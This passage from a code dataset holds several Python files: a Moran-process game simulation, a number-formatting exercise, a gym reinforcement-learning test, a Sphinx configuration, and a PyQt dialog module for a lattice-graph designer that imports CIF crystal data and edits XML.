specific structure is desired that cannot be\r\n automatically generated.\r\n If the structure may be automatically generated,\r\n please write it in the GraphGenerator class\r\n '''\r\n edges = gen_graph.ring_graph()\r\n axl_graph = Graph(edges) #makes axelrod graph instant, for the actual game\r\n mp = axl.MoranProcess(players, interaction_graph=axl_graph, seed=1)\r\n populations = mp.play()\r\n print(f\"There were {len(mp)} rounds in the simple Moran game\")\r\n print(f\"{mp.winning_strategy_name} won the simple Moran game\")\r\n mp.populations_plot()\r\n gen_graph.visualise_graph(edges)\r\n\r\n #to measure performance, help us determine if we will need any HPC time\r\n t1 = time.perf_counter()\r\n print(f\"Simple Moran program ran in {t1-t_import_1:0.5f} seconds\")\r\n\r\n plt.show() #finally show all plots called\r\nmain()\r\n\r\ndef mutation():\r\n t2 = time.perf_counter()\r\n #randomly chosen list of strategies\r\n players = [axl.Cooperator(), axl.Defector(),\r\n axl.TitForTat(), axl.Grudger(),\r\n axl.Alternator(), axl.AdaptorBrief(),\r\n axl.AdaptorLong(), axl.Random(),\r\n axl.Retaliate(), axl.Punisher()]\r\n #initiate graph for visualisation and automatic edge production\r\n gen_graph = GraphGenerator(players)\r\n '''\r\n Now create the edges for axelrod\r\n GraphGenerator will do this automatically for 
some graph types\r\n but a properly formatted list may also be supplied\r\n if a specific structure is desired that cannot be\r\n automatically generated.\r\n If the structure may be automatically generated,\r\n please write it in the GraphGenerator class\r\n '''\r\n edges = gen_graph.ring_graph()\r\n axl_graph = Graph(edges) #makes axelrod graph instant, for the actual game\r\n\r\n mp = axl.MoranProcess(\r\n players, interaction_graph=axl_graph, mutation_rate=0.05, seed=10\r\n )\r\n #this loop stops the game running indefinitely\r\n for _ in mp:\r\n if len(mp.population_distribution()) == 1:\r\n break\r\n mp.population_distribution() #run the game\r\n mp.populations_plot()\r\n gen_graph.visualise_graph(edges)\r\n\r\n t3 = time.perf_counter()\r\n print(f\"Mutation program ran in {t3-t2:0.5f} seconds\")\r\n\r\n plt.show()\r\nmutation()\r\n","repo_name":"adam-webster/MPhys","sub_path":"graph_moran.py","file_name":"graph_moran.py","file_ext":"py","file_size_in_byte":3172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"36047651657","text":"def print_formatted(number): \r\n n = number\r\n size = len(bin(n)) - 2\r\n for i in range(1, n + 1):\r\n dec = str(i)\r\n octal = oct(i)\r\n hexadecimal = hex(i)\r\n binary = bin(i)\r\n print(dec.rjust(size), octal.lstrip(\"0o\").rjust(size), \r\n (hexadecimal.lstrip(\"0x\").rjust(size)).upper(), binary.lstrip(\"0b\").rjust(size))\r\n\r\n","repo_name":"bseitkazin/hackerrank_and_pytest","sub_path":"String_Formatting.py","file_name":"String_Formatting.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"35356098359","text":"import gym\nimport sys\nsys.path.append('C:/Users/xuwei1/Documents/baselines')\n\nfrom baselines import deepq\nimport time\n\ndef test0():\n env = gym.make(\"OptimizeGauss-v0\")\n act = deepq.load(\"model/gauss.pkl\")\n episode = 0\n for i in range(1000):\n obs, done = env.reset(), False\n episode_rew = 0\n while not done:\n obs, rew, done, _ = env.step(act(obs[None])[0])\n episode_rew += rew\n # print(episode_rew)\n\n print(env.gauss(obs))\n\nif __name__ == '__main__':\n test0()","repo_name":"PlusWayne/Optimize_based_on_RL","sub_path":"Optimize_based_on_RL/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"73318721605","text":"import sys\nfrom pathlib import Path\nimport copy\n\nsys.path.insert(0, str(Path(__file__).parents[0]))\n[sys.modules.pop(m) for m in copy.copy(sys.modules) if m.startswith(\"target\")]\n\n# for sphinx-build\nif \"sphinx_autodoc_multimethod\" not in sys.modules:\n sys.path.insert(0, str(Path(__file__).parents[3]))\n\nextensions = [\n \"sphinx.ext.autodoc\",\n \"sphinx_autodoc_multimethod\",\n]\n\nnitpicky = True\n\nautodoc_typehints = \"both\"\nautodoc_typehints_description_target = \"all\"\nautodoc_typehints_format = \"short\"\n","repo_name":"lorenzncode/sphinx-autodoc-multimethod","sub_path":"tests/roots/test-multimethod/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"32116996684","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 28 23:13:29 2017\n\n@author: Ivan Luchko (luchko.ivan@gmail.com)\n\nThis module contains the definition of impotant dialogs and 
widgets used in app:\n \n class QNotImplemented(QMessageBox):\n class DialogExportLG(QDilaog, Ui_DialogExportLG):\n class DialogSelectLG(QDilaog, Ui_DialogSelectLG):\n class DialogChangeEdgeType(QDilaog, Ui_DialogChangeEdgeType):\n class DialogEditXML(QDialog, Ui_DialogEditXML):\n\n class QSitesListItemWidget(QWidget, Ui_mySiteListItem):\n class DialogSelectSites(QDialog, Ui_selectSites):\n class DialogImportCryst(QDilaog, Ui_DialogImportCryst):\n \n class QColorListItemWidget(QWidget, Ui_myColorListItem):\n class QGraphElemPreference(QCustomListWidget_Add):\n class MyWidgetPreferences(WidgetPreferences, Ui_WidgetPreferences):\n class MyDialogPreferences(DialogPreferences): \n\n class QDistListItemWidget(QWidget, Ui_myDistListItem):\n class MyDistToolBox(QCustomListWidget_Add):\n class DialogDistSearch(QDialog, MyDistToolBox):\n\ntesting and examples:\n \n class TestMainWindow(QObject):\n def test_QGraphElemPreference():\n def test_MyWidgetPreferences():\n def run_test():\n\nModule is compatible with both pyQt4 and pyQt5\n \n\"\"\"\n\nfrom __future__ import division # make python 2 use float division\n\n# define pyQt version\ntry:\n import PyQt4 as PyQt\n pyQtVersion = \"PyQt4\"\n\nexcept ImportError:\n try:\n import PyQt5 as PyQt\n pyQtVersion = \"PyQt5\"\n except ImportError:\n raise ImportError(\"neither PyQt4 or PyQt5 is found\")\n\n# imports requied PyQt modules \nif pyQtVersion == \"PyQt4\":\n from PyQt4.uic import loadUiType\n from PyQt4.QtCore import Qt, pyqtSignal\n from PyQt4.QtGui import (QMessageBox, QFontDialog, QFileDialog, QPushButton, \n QDialogButtonBox, QListWidgetItem, QLabel, QSlider,\n QHBoxLayout, QSizePolicy, QTextCursor, QTextFormat, \n QColor, QFont, QShortcut, QKeySequence)\nelse:\n from PyQt5.uic import loadUiType\n from PyQt5.QtCore import Qt, pyqtSignal\n from PyQt5.QtGui import (QColor, QFont, QTextCursor, QTextFormat, QKeySequence) \n from PyQt5.QtWidgets import (QMessageBox, QFontDialog, QFileDialog, QPushButton, \n QDialogButtonBox, QListWidgetItem, QLabel, \n QSlider, QHBoxLayout, QSizePolicy, QShortcut) \ndef getPathString(output):\n '''\n returns a path string of the QFileDialog output\n \n pyQt5 returns a tuple (path, filter) not just a path QString like pyQt4\n \n '''\n return str(output if pyQtVersion == \"PyQt4\" else output[0])\n\n# import python libs\nimport os\nimport numpy as np\nimport xml.etree.ElementTree as ET\n\n# import project modules\nfrom latticegraph_designer.app.mpl_pane import GraphEdgesEditor \nfrom latticegraph_designer.app.core import (ParseXML, ExportXML, UnitCell, \n Lattice, CrystalCluster)\nfrom latticegraph_designer.widgets import (QColorButton, XMLHighlighter, \n QCodeEditor, QCustomListWidget, \n QCustomListWidget_Add, DealXML,\n DialogPreferences, WidgetPreferences)\n\n# import UI layout created in designer\nui_folder = os.path.dirname(__file__)+'/../resources/ui_layout/'\n#ui_folder = 'latticegraph_designer/resources/ui_layout/'\nUi_DialogExportLG, QDilaog = loadUiType(ui_folder+'dialog_exportLG.ui')\nUi_DialogSelectLG, QDilaog = loadUiType(ui_folder+'dialog_select_LATTICEGRAPH.ui')\nUi_DialogChangeEdgeType, QDilaog = loadUiType(ui_folder+'dialog_changeEdgeType.ui')\nUi_DialogEditXML, QDialog = loadUiType(ui_folder+'dialog_EditXML.ui')\nUi_mySiteListItem, QDilaog = loadUiType(ui_folder+'widget_mySiteListItem.ui')\nUi_selectSites, QDilaog = loadUiType(ui_folder+'dialog_selectSites.ui')\nUi_DialogImportCryst, QDilaog = loadUiType(ui_folder+'dialog_importCryslat.ui')\nUi_myColorListItem, QWidget = 
loadUiType(ui_folder+'widget_myColorListItem.ui')\nUi_WidgetPreferences, QWidget = loadUiType(ui_folder+'widget_myPreferences.ui')\nUi_myDistListItem, QWidget = loadUiType(ui_folder+'widget_myDistListItem.ui')\n\n# classes definition\n\nclass QNotImplemented(QMessageBox):\n '''called when some functionality is not implemented yet'''\n \n def __init__(self): \n super(QNotImplemented,self).__init__()\n self.setAttribute(Qt.WA_DeleteOnClose)\n self.setIcon(QMessageBox.Information)\n self.setText(\"Not implemented yet\")\n self.setWindowTitle(\"Message\")\n self.setStandardButtons(QMessageBox.Ok)\n self.exec_() \n\n\nclass DialogExportLG(QDilaog, Ui_DialogExportLG):\n '''exporting Lattice Graph providing Boundary and Lattice Graph name'''\n def __init__(self, parent, LG_name, boundary):\n super(DialogExportLG, self).__init__()\n self.setupUi(self)\n \n boundaty_list = [\"periodic\",\"open\"]\n self.lineEdit_LGname.setText(LG_name)\n self.comboBox_boundary.addItems(boundaty_list)\n currentIndex = boundaty_list.index(boundary)\n self.comboBox_boundary.setCurrentIndex(currentIndex)\n self.btnPreviewXML.clicked.connect(parent.editXML_callback)\n \n\nclass DialogSelectLG(QDilaog, Ui_DialogSelectLG):\n '''selecting lattice graph from list in xml library'''\n def __init__(self, parent, names):\n super(DialogSelectLG, self).__init__()\n self.setAttribute(Qt.WA_DeleteOnClose)\n self.setupUi(self)\n \n self.parent = parent\n self.list_LG_names.currentItemChanged.connect(self.importXML)\n \n defaultItem = QListWidgetItem(names[0])\n self.list_LG_names.addItem(defaultItem)\n self.list_LG_names.setCurrentItem(defaultItem)\n\n if len(names) > 1:\n for name in names[1:]:\n self.list_LG_names.addItem(str(name))\n \n def importXML(self, selectedItem):\n \n self.parent.importXml(str(selectedItem.text()))\n self.parent.fileNameXML = None\n\n\nclass DialogChangeEdgeType(QDilaog, Ui_DialogChangeEdgeType):\n '''Change type of the selected edge'''\n def __init__(self, parent):\n super(DialogChangeEdgeType, self).__init__()\n self.setAttribute(Qt.WA_DeleteOnClose)\n self.setupUi(self)\n \n self.parent = parent\n edge = parent.UC.edges[parent.gee.e_active_ind]\n _type = edge.type\n num = len(parent.gee.e_activeDist_ids) \n if num == 0:\n label = \"Selected edge: {}\".format(edge)\n else:\n label = \"Selected {0} edges with length: {1}\".format(num, edge.length)\n \n self.label_selected.setText(label)\n self.spinBox_current.setValue(_type)\n self.spinBox_new.setValue(_type)\n \n self.btnOk.clicked.connect(self.ok_callback)\n self.btnCancel.clicked.connect(self.reject)\n \n def ok_callback(self):\n self.parent.gee.change_active_edge_type(self.spinBox_new.value())\n self.accept()\n\n\nclass DialogEditXML(QDialog, Ui_DialogEditXML):\n '''Dialog for interacting with xml library code'''\n \n def __init__(self, parent):\n super(DialogEditXML, self).__init__()\n self.setAttribute(Qt.WA_DeleteOnClose)\n self.setupUi(self)\n \n # \"overload\" codeEditor \n self.vbox.removeWidget(self.codeEditor)\n self.codeEditor.setParent(None)\n self.codeEditor.deleteLater()\n \n self.codeEditor = QCodeEditor(DISPLAY_LINE_NUMBERS = True, \n HIGHLIGHT_CURRENT_LINE = False,\n SyntaxHighlighter = XMLHighlighter) \n self.vbox.insertWidget(1,self.codeEditor)\n \n self.parent = parent\n self.fileNameXML = parent.fileNameXML\n self.labelName.setText(\"XML library file: \"+self.parent.getFileLabelText())\n\n self.setup_edgeHighlighter()\n self.setXML_fromGEE() # import xml code\n # highlight active edge\n 
self.selectedEdgeChanged_slot(self.parent.gee.e_active_ind)\n\n self.parent.unitCellChanged.connect(self.setXML_fromGEE)\n self.buttonBox.button(QDialogButtonBox.Apply).clicked.connect(self.apply_callback) \n self.btnFont.clicked.connect(self.changeFont_callback)\n \n def setXML_fromGEE(self):\n '''add to aditor xml code of the model defined in GraphEdgesEditor''' \n #remember scrollBar position\n scrollValue = self.codeEditor.verticalScrollBar().value() \n exporter = ExportXML(self.parent.gee.cluster.lattice,\n self.parent.gee.cluster.UC,\n self.parent.LATTICEGRAPH_name,\n NEW_ID = False)\n self.codeEditor.setPlainText(exporter.get_xml_string())\n \n # restore scrollBar position\n self.codeEditor.verticalScrollBar().setValue(scrollValue)\n\n def setup_edgeHighlighter(self):\n '''setup active edge code block highligter format'''\n \n self.cursor = QTextCursor(self.codeEditor.document())\n self.noFormat = self.cursor.blockFormat()\n self.activeEdgeFormat = self.cursor.blockFormat()\n self.activeEdgeFormat.setBackground(QColor(\"#e2e2e2\"))\n self.activeEdgeFormat.setProperty(QTextFormat.FullWidthSelection,True)\n\n self.parent.selectedEdgeChanged.connect(self.selectedEdgeChanged_slot)\n self.parent.selectedEdgeChangedList.connect(self.selectedEdgeChanged_slot)\n\n def selectedEdgeChanged_slot(self, _id):\n '''highlight the block of code coresponding to the selected edge '''\n \n # dlete previous highlighting \n self.cursor.setBlockFormat(self.noFormat)\n # set new highlighting\n if _id is not None:\n # search for block of code\n strBegin = '', self.begin)\n # select block and change format\n self.cursor.setPosition(self.begin, QTextCursor.KeepAnchor)\n self.cursor.setBlockFormat(self.activeEdgeFormat)\n \n # set proper position of scrollBar\n N = 3; d = 4\n for i in range(d+N):\n self.cursor_begin.movePosition(QTextCursor.Down)\n self.codeEditor.setTextCursor(self.cursor_begin)\n for i in range(d+2*N):\n self.cursor_begin.movePosition(QTextCursor.Up)\n self.codeEditor.setTextCursor(self.cursor_begin)\n for i in range(d):\n self.cursor_begin.movePosition(QTextCursor.Down)\n self.codeEditor.setTextCursor(self.cursor_begin)\n \n def changeFont_callback(self):\n '''change font of the codeEditor'''\n currentFont = self.codeEditor.currentCharFormat().font()\n currentFont.setStyle(QFont.StyleNormal)\n font, valid = QFontDialog.getFont(currentFont)\n if valid:\n self.codeEditor.setFont(font)\n \n def apply_callback(self):\n '''apply changes add update GraphEdgesEditor'''\n \n text = str(self.codeEditor.toPlainText())\n self.parent.parser = ParseXML(string = text) \n LG_name = self.parent.parser.get_LATTICEGRAPH_names()[0]\n self.parent.importXml(LG_name) \n #edges ids are changes (ordered) after importing importing \n self.setXML_fromGEE() \n\n\n# classes for importting structure proving crystal parameters\n\n\nclass QSitesListItemWidget(QWidget, Ui_mySiteListItem):\n '''widget for setting listWidget parameters: bool, label, label1, x, y, z'''\n\n def __init__ (self, parent=None):\n super(QSitesListItemWidget, self).__init__(parent)\n self.setupUi(self)\n \n def set_data(self, data, strFlag=False):\n \n if data.get(\"bool\") is not None: self.checkBox.setChecked(data[\"bool\"])\n if data.get(\"label\") is not None: self.label.setText(str(data[\"label\"]))\n if data.get(\"type\") is not None: self.label_type.setText(str(data[\"type\"])) \n if data.get(\"x\") is not None: self.lineEdit_x.setText(str(data[\"x\"]))\n if data.get(\"y\") is not None: self.lineEdit_y.setText(str(data[\"y\"]))\n if 
data.get(\"z\") is not None: self.lineEdit_z.setText(str(data[\"z\"])) \n \n def get_data(self): \n\n data = {\"bool\":self.checkBox.isChecked(),\n \"label\":str(self.label.text()),\n \"type\":str(self.label_type.text()),\n \"x\":str(self.lineEdit_x.text()),\n \"y\":str(self.lineEdit_y.text()),\n \"z\":str(self.lineEdit_z.text())} \n \n return data \n\n\nclass DialogSelectSites(QDialog, Ui_selectSites):\n '''dialog for selecting sites during parsing a cif file''' \n \n def __init__ (self, data):\n\n super(DialogSelectSites, self).__init__()\n self.setAttribute(Qt.WA_DeleteOnClose)\n self.setupUi(self)\n \n # \"overload\" prefWidget \n self.vbox.removeWidget(self.listWidget)\n self.listWidget.setParent(None)\n self.listWidget.deleteLater() \n self.listWidget = QCustomListWidget(QCustomWidget = QSitesListItemWidget,\n initializationData = data)\n self.vbox.insertWidget(1, self.listWidget)\n \n self.checkBox_all.toggled.connect(self.select_all)\n self.btnCancel.clicked.connect(self.reject)\n self.btnOk.clicked.connect(self.ok_callback)\n \n def select_all(self, _bool):\n '''select/unselect all items'''\n \n data = self.listWidget.get_data()\n for line in data:\n line[\"bool\"] = _bool \n self.listWidget.set_data(data)\n \n def ok_callback(self):\n '''when button Ok is pressed'''\n \n data = self.listWidget.get_data()\n # create sites text\n atomsTextLine = [\" \".join([d[\"x\"],d[\"y\"],d[\"z\"]]) for d in data if d[\"bool\"]] \n self.atomsText = '\\n'.join(atomsTextLine)\n self.accept()\n\n\nclass DialogImportCryst(QDilaog, Ui_DialogImportCryst):\n '''Importing Crystal providing lattice and unit cell parameters'''\n \n def __init__(self, parent):\n super(DialogImportCryst, self).__init__()\n self.setAttribute(Qt.WA_DeleteOnClose)\n self.setupUi(self)\n \n self.parent = parent\n self.UC = self.parent.UC\n self.lattice = self.parent.lattice\n \n self.btnClose.clicked.connect(self.reject)\n self.btnImport.clicked.connect(self.importCrystal_callback)\n self.btnCIF.clicked.connect(self.process_cif_callback)\n \n self.initialize_forms()\n \n def initialize_forms(self):\n \n self.lineEdit_a.setText(str(round(self.lattice.a, 3)))\n self.lineEdit_b.setText(str(round(self.lattice.b, 3)))\n self.lineEdit_c.setText(str(round(self.lattice.c, 3)))\n\n self.lineEdit_alpha.setText(str(round(np.rad2deg(self.lattice.alpha),3))) \n self.lineEdit_beta.setText(str(round(np.rad2deg(self.lattice.beta),3))) \n self.lineEdit_gamma.setText(str(round(np.rad2deg(self.lattice.gamma),3))) \n\n self.textEdit_symops.setText('x, y, z')\n atomsText = ''\n for key, vertex in self.UC.vertices.items():\n coords = ' '.join([str(round(num,5)) for num in vertex.coords]) \n atomsText = atomsText + coords + '\\n'\n \n self.textEdit_atoms.setText(atomsText)\n \n def importCrystal_callback(self):\n '''\n compute the coordinates of a unit cell sites according to the \n space group symmetry operations and import the crystal.\n \n '''\n msg = \" Computig the vertices coordinates applying symetry operations\" \n self.parent.statusBar().showMessage(msg)\n if self.parent.TEXT_MODE:\n print(msg)\n \n # parse lattice parameters\n cryst_params = []\n lEs = [self.lineEdit_a, self.lineEdit_b, self.lineEdit_c,\n self.lineEdit_alpha,self.lineEdit_beta,self.lineEdit_gamma]\n for lineEdit in lEs:\n cryst_params.append(float(lineEdit.text())) \n abc = cryst_params[:3]\n angles = cryst_params[3:]\n\n # parse atoms coordinates \n atomsText = str(self.textEdit_atoms.toPlainText())\n atomsText = ''.join(e for e in atomsText if e not in \",\") # strip 
comma\n lines = atomsText.splitlines()\n sites = [[float(num) for num in line.split(' ')] for line in lines if line != '']\n\n # parse symmetry operations\n symopsText = str(self.textEdit_symops.toPlainText())\n symopsText = ''.join(e for e in symopsText if e not in \" '\") #strip space and '\n symops_list = [line.split(',') for line in symopsText.splitlines() if line != '']\n \n # check if parsed corectly\n for symop in symops_list:\n if len(symop) != 3:\n raise ValueError(\"Symmetry operations are not defined according to 'x, y, z' pattern with comma used as separator\")\n \n # create UC and lattice \n self.parent.lattice = Lattice(cell_lengths = abc, angles = angles)\n self.parent.UC = UnitCell(self.parent.lattice)\n self.parent.UC.add_vertices_using_symops(sites, symops_list, \n self.radioButton_diffTypes.isChecked())\n self.parent.cluster = CrystalCluster(self.parent.UC,\n self.parent.lattice,\n self.parent.size)\n self.parent.ax.clear()\n self.parent.gee = GraphEdgesEditor(self.parent.ax, self.parent.cluster, \n parent = self.parent, \n display_report = self.parent.TEXT_MODE) \n self.parent.canvas.draw()\n \n msg = \" {} vertices were created\".format(self.parent.UC.num_vertices) \n self.parent.statusBar().showMessage(msg, 2000)\n if self.parent.TEXT_MODE:\n print(msg)\n \n self.parent.fileNameXML = None\n self.parent.LATTICEGRAPH_name = \"None\"\n self.parent.label_fileNameXML.setText(\"XML library file: None\")\n self.parent.label_LG_name.setText(\"Lattice graph name: None\")\n \n self.parent.unitCellChanged.emit() \n\n def process_cif_callback(self):\n '''get fileName from file dialog and process cif file'''\n \n output = QFileDialog.getOpenFileName(self, \n 'Open Crystallographic Information File',\n filter = \"CIF (*.cif);;All files (*.*)\") \n fileName = getPathString(output)\n \n if fileName == \"\":\n return\n else:\n self.process_cif(fileName) \n\n def process_cif(self, fileName, TESTING=False):\n '''parse lattice parameters from cif file'''\n \n abc, angles, UC_data, sg_data = self.parse_cif_file(fileName)\n \n # select atoms sites to consider in model\n \n self.dlg = DialogSelectSites(data = UC_data)\n \n if TESTING:\n self.dlg.ok_callback() \n \n elif not self.dlg.exec_():\n return\n \n sitesDatatext = self.dlg.atomsText\n \n # initialize widget\n \n self.lineEdit_a.setText(str(abc[0]))\n self.lineEdit_b.setText(str(abc[1]))\n self.lineEdit_c.setText(str(abc[2]))\n\n self.lineEdit_alpha.setText(str(angles[0])) \n self.lineEdit_beta.setText(str(angles[1])) \n self.lineEdit_gamma.setText(str(angles[2])) \n\n self.textEdit_symops.setText(\"\\n\".join(sg_data))\n self.textEdit_atoms.setText(sitesDatatext)\n \n def parse_cif_file(self, fileName): \n '''\n read and process data from cif file\n \n return:\n\n abc = [a,b,c] - list of unit cell length\n angles = [alpha, beta, gamma] - list of unit cell angles \n UC_data = [site, ... ] - list of unit cell sites labels and coordinates\n where: site = {'bool':_ ,'label':_, 'type':_, 'x':_, 'y':_, 'z':_}\n site['bool'] - defines wheather to use site in the model \n sg_data = ['x, y, z', ...] 
- space group symmetry operation list\n \n ''' \n with open(fileName, 'r') as f:\n read_data = f.read()\n \n read_data = read_data.replace(\"\\r\",\"\")\n read_data = read_data.replace(\"\\n \\n\",\"\\n\\n\")\n blocks = read_data.split(\"\\n\\n\")\n \n abc, angles = self.get_lattice_data(blocks)\n UC_data = self.get_UC_data(blocks)\n sg_data = self.get_sg_data(blocks)\n \n return abc, angles, UC_data, sg_data\n\n\n def get_lattice_data(self, blocks):\n '''return lattice parameters data'''\n \n keys = [\"_cell_length_a\", \"_cell_length_b\", \"_cell_length_c\",\n \"_cell_angle_alpha\", \"_cell_angle_beta\", \"_cell_angle_gamma\"]\n \n latttice_block = self.get_block_by_word(blocks, \"_cell_length_a\")\n data = []\n for key in keys:\n for line in latttice_block.splitlines():\n if key in line:\n data.append(self._float(line.split()[-1]))\n break\n return data[:3], data[3:] \n \n def get_UC_data(self, blocks):\n '''return unit cell data'''\n \n keys = [\"_atom_site_label\", \"_atom_site_type_symbol\",\n \"_atom_site_fract_x\", \"_atom_site_fract_y\", \"_atom_site_fract_z\"]\n \n UC_block = self.get_block_by_word(blocks, \"_atom_site_fract_x\") \n data = self.get_list_val(UC_block, keys)\n # turn to float site coords\n data = [[val if j<2 else self._float(val) for j, val in enumerate(line)] for line in data]\n\n data_keys = [\"label\", \"type\", \"x\", \"y\", \"z\"]\n data = [{data_keys[j]:val for j, val in enumerate(line)} for line in data]\n for line in data:\n line[\"bool\"] = line[\"type\"] in [\"Cu\"] # automaticly selected atoms\n \n return data \n \n def get_sg_data(self, blocks):\n '''return space group symmetry operations'''\n \n keys = [\"_space_group_symop_operation_xyz\"]\n sg_block = self.get_block_by_word(blocks, keys[0])\n data = self.get_list_val(sg_block, keys)\n data = [line[0] for line in data]\n \n return data\n\n # helper functions\n \n def get_block_by_word(self, blocks, word):\n '''helper: return block if it contains a word'''\n for block in blocks:\n if word in block:\n return block\n \n def _float(self, string):\n '''helper: return string without precision parenthesis: 1.23(3)'''\n return float(string.split(\"(\")[0])\n \n def words_split(self, line):\n '''split line on words counting symbols between \" chars as single word'''\n \n new_line = []\n in_word = False\n j0 = 0\n for j, char in enumerate(line):\n if (char == \"'\") or (char == \"\\\"\"):\n if in_word:\n new_line.append(line[j0:j])\n else:\n new_line += line[j0:j].split(' ')\n \n in_word = not in_word\n j0 = j+1\n \n new_line += line[j0:].split(' ')\n new_line = [elem for elem in new_line if elem != \"\"] \n \n return new_line\n \n def get_list_val(self, block, keys):\n '''return data list according to keys in _loop block'''\n \n lines = block.split(\"loop_\")[-1].splitlines()\n lines = [line for line in lines if line != \"\"]\n all_keys = [line.strip() for line in lines if \"_\" in line]\n all_line_vals = lines[len(all_keys):]\n \n data = []\n for line in all_line_vals:\n data_line = [] \n for j, val in enumerate(self.words_split(line)):\n if all_keys[j] in keys:\n data_line.append(val)\n data.append(data_line)\n \n return data \n \n \n# Preference dialog classes\n\n \nclass QColorListItemWidget(QWidget, Ui_myColorListItem):\n '''widget for setting listWidget parameters: label, bool, color'''\n\n def __init__ (self, parent=None):\n super(QColorListItemWidget, self).__init__(parent)\n self.setupUi(self) \n \n # \"overload\" colorBtn \n self.horizontalLayout.removeWidget(self.colorBtn)\n 
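# --- Editor's note: illustrative sketch, not part of the original file. ---
# A CIF "loop_" block lists its column keys first, then whitespace-separated
# data rows; get_list_val()/words_split() above pick out the wanted columns.
# The simplified stand-alone version below skips quoted-token handling and
# uses an invented sample block, purely to show the key-to-row mapping.

def parse_loop_block(block, wanted_keys):
    lines = [ln for ln in block.split("loop_")[-1].splitlines() if ln.strip()]
    keys = [ln.strip() for ln in lines if ln.strip().startswith("_")]
    rows = lines[len(keys):]
    return [{k: v for k, v in zip(keys, row.split()) if k in wanted_keys}
            for row in rows]

sample = """loop_
 _atom_site_label
 _atom_site_fract_x
 _atom_site_fract_y
 _atom_site_fract_z
 Cu1 0.00 0.00 0.50
 O1 0.25 0.25 0.00"""
print(parse_loop_block(sample, ["_atom_site_label", "_atom_site_fract_x"]))
# [{'_atom_site_label': 'Cu1', '_atom_site_fract_x': '0.00'},
#  {'_atom_site_label': 'O1', '_atom_site_fract_x': '0.25'}]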
self.colorBtn.setParent(None)\n self.colorBtn.deleteLater() \n self.colorBtn = QColorButton()\n self.horizontalLayout.addWidget(self.colorBtn)\n \n def set_data(self, data, strFlag=False):\n '''\n data - dictionary with corresponding keys\n if strFlag = True return input data has str format\n\n '''\n if data.get(\"label\") is not None: self.label.setText(str(data[\"label\"]))\n if data.get(\"bool\") is not None: \n self.checkBox.setChecked((data[\"bool\"]==\"True\") if strFlag else data[\"bool\"])\n if data.get(\"color\") is not None: self.colorBtn.set_color(data[\"color\"])\n \n def get_data(self):\n '''return widgets data'''\n \n data = {\"label\": str(self.label.text()),\n \"bool\": self.checkBox.isChecked(),\n \"color\": self.colorBtn.get_color()}\n \n return data \n \n\nclass QGraphElemPreference(QCustomListWidget_Add):\n '''toolBox for manipulating vertices and edges preferences'''\n \n def __init__ (self, label=\"myLabel\", initializationData=[]):\n '''label = Vertices or 'Edges'. '''\n\n if initializationData == []:\n initializationData = self.create_initalizing_data()\n \n super(QGraphElemPreference, self).__init__(QColorListItemWidget, initializationData)\n self.sliderSize = QSlider(Qt.Horizontal)\n self.labelSize = QLabel(\"Size: \")\n self.hbox_size = QHBoxLayout()\n self.hbox_size.addWidget(self.labelSize)\n self.hbox_size.addWidget(self.sliderSize)\n self.label = label \n self.labelQ = QLabel(self.get_labelStr())\n self.labelQ.setAlignment(Qt.AlignCenter) \n sizePolicy = QSizePolicy(QSizePolicy.Expanding,QSizePolicy.Fixed)\n self.labelQ.setSizePolicy(sizePolicy)\n #change order of btnAdd\n self.vbox.insertLayout(0,self.hbox_size) \n self.vbox.insertWidget(0,self.labelQ)\n \n def add_item_callback(self): \n '''overloaded method'''\n newItem = self.QCustomWidget()\n newItem.set_data({\"label\": \"type {}\".format(self.listWidget.count()),\n \"bool\": True,\n \"color\": None})\n self.listWidget.add_item(newItem)\n self.listWidget.scrollToBottom()\n self.labelQ.setText(self.get_labelStr())\n \n def get_labelStr(self):\n '''get label string'''\n \n return self.label+\" ({})\".format(self.listWidget.count())\n \n def get_data_ET(self, tag):\n '''get xml ElementTree containing preferences data'''\n \n SETTINGS = ET.Element(tag)\n \n SIZE = ET.Element(\"SIZE\")\n SIZE.set(\"size\", str(self.sliderSize.value()))\n SETTINGS.append(SIZE) \n dataList = self.listWidget.get_data()\n \n for data in dataList:\n PREFERENCE = ET.Element(\"PREFERENCE\")\n for key, val in data.items():\n PREFERENCE.set(key, str(val))\n SETTINGS.append(PREFERENCE)\n \n return SETTINGS\n \n def set_data_ET(self, root):\n '''get xml ElementTree containing preferences data'''\n \n self.sliderSize.setValue(float(root.find(\"SIZE\").get(\"size\")))\n data_list = []\n for item in root.findall(\"PREFERENCE\"):\n data_list.append(item.attrib)\n self.listWidget.set_data(data_list, strFlag = True)\n self.labelQ.setText(self.get_labelStr())\n \n def create_initalizing_data(self):\n '''returns default initializing data for QCustomListWidget'''\n \n clrs = [u'#00aaff', u'#ff0000', u'#ffff7f', u'#ffaaff', u'#aaffff',\n u'#ffaa7f', u'#a3ff82', u'#5500ff', u'#aa007f', u'#ffffff'] \n \n data = [{\"label\":\"type %s\"%j,\"bool\":True,\"color\":clr} for j,clr in enumerate(clrs)]\n \n return data\n\n\nclass MyWidgetPreferences(WidgetPreferences, Ui_WidgetPreferences):\n '''widget used for setting up mpl manipulation pane preferences'''\n \n def __init__ (self):\n \n super(MyWidgetPreferences, self).__init__()\n self.setupUi(self)\n 
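# --- Editor's note: illustrative sketch, not part of the original file. ---
# get_data_ET()/set_data_ET() above serialise widget state as attributes of
# PREFERENCE elements under a parent tag, next to a SIZE element. The
# stand-alone round trip below uses the same tag and attribute names with
# invented values.

import xml.etree.ElementTree as ET

def prefs_to_element(tag, size, prefs):
    root = ET.Element(tag)
    ET.SubElement(root, "SIZE").set("size", str(size))
    for pref in prefs:
        el = ET.SubElement(root, "PREFERENCE")
        for key, val in pref.items():
            el.set(key, str(val))
    return root

def element_to_prefs(root):
    size = float(root.find("SIZE").get("size"))
    return size, [item.attrib for item in root.findall("PREFERENCE")]

root = prefs_to_element("VERTICES", 40,
                        [{"label": "type 0", "bool": True, "color": "#00aaff"}])
print(ET.tostring(root).decode())
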